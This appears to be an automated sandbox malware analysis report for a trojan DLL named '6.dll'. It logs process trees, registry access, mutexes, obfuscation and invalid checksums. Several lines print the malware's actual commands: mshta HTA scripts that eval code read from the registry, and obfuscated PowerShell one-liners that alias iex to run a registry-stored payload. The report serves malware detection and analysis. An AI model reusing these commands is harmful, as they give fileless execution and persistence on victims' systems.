Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F16C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_00F16C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F165B4 NtMapViewOfSection,	4_2_00F165B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F17562 GetProcAddress,NtCreateSection,memset,	4_2_00F17562
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1B2A9 NtQueryVirtualMemory,	4_2_00F1B2A9

Sample file is different than original file name gathered from version info

Source: 6.dll	Binary or memory string: OriginalFilenameSymErr.exeT vs 6.dll
Source: 6.dll	Binary or memory string: OriginalFilenameNsc.exe. vs 6.dll
Source: 6.dll	Binary or memory string: OriginalFilenamebyInstallHelper.exe. vs 6.dll
Source: 6.dll	Binary or memory string: OriginalFilenameBgRegister.exe4 vs 6.dll

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

PE file contains strange resources

Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

PE / OLE file has an invalid certificate

Source: 6.dll

Static PE information: invalid certificate

Source: 6.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\6.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1

Source: classification engine

Classification label: mal100.troj.evad.winDLL@59/52@16/4

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00F13309 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_00F13309

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1

Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{542DFF7D-A3B8-A645-CDC8-873A517CAB0E}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B0E37361-4FA3-62B8-59E4-F3B69D58D74A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{80FA9EC6-DFAB-B287-69B4-8306AD28679A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6824B7BA-A73C-DA91-711C-CBAE35102FC2}
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{EC2366C9-5BCE-FEAF-45E0-BF1249146366}

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: 6.dll

Static file information: File size 1781920 > 1048576

Source: 6.dll

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fa00

Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1B073 push ecx; ret	4_2_00F1B083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1E97E pushad ; iretd	4_2_00F1E982
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1AD40 push ecx; ret	4_2_00F1AD49

PE file contains an invalid checksum

Source: 6.dll	Static PE information: real checksum: 0x1ba6ec should be: 0x1b8278
Source: nigogz4l.dll.33.dr	Static PE information: real checksum: 0x0 should be: 0xee8b
Source: dtnsoflb.dll.43.dr	Static PE information: real checksum: 0x0 should be: 0x4b02
Source: nlbomp32.dll.35.dr	Static PE information: real checksum: 0x0 should be: 0xf45d
Source: uu5u2nmv.dll.40.dr	Static PE information: real checksum: 0x0 should be: 0xa363
Source: wklr4juq.dll.36.dr	Static PE information: real checksum: 0x0 should be: 0x1029d

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll

Compiles C# or VB.Net code

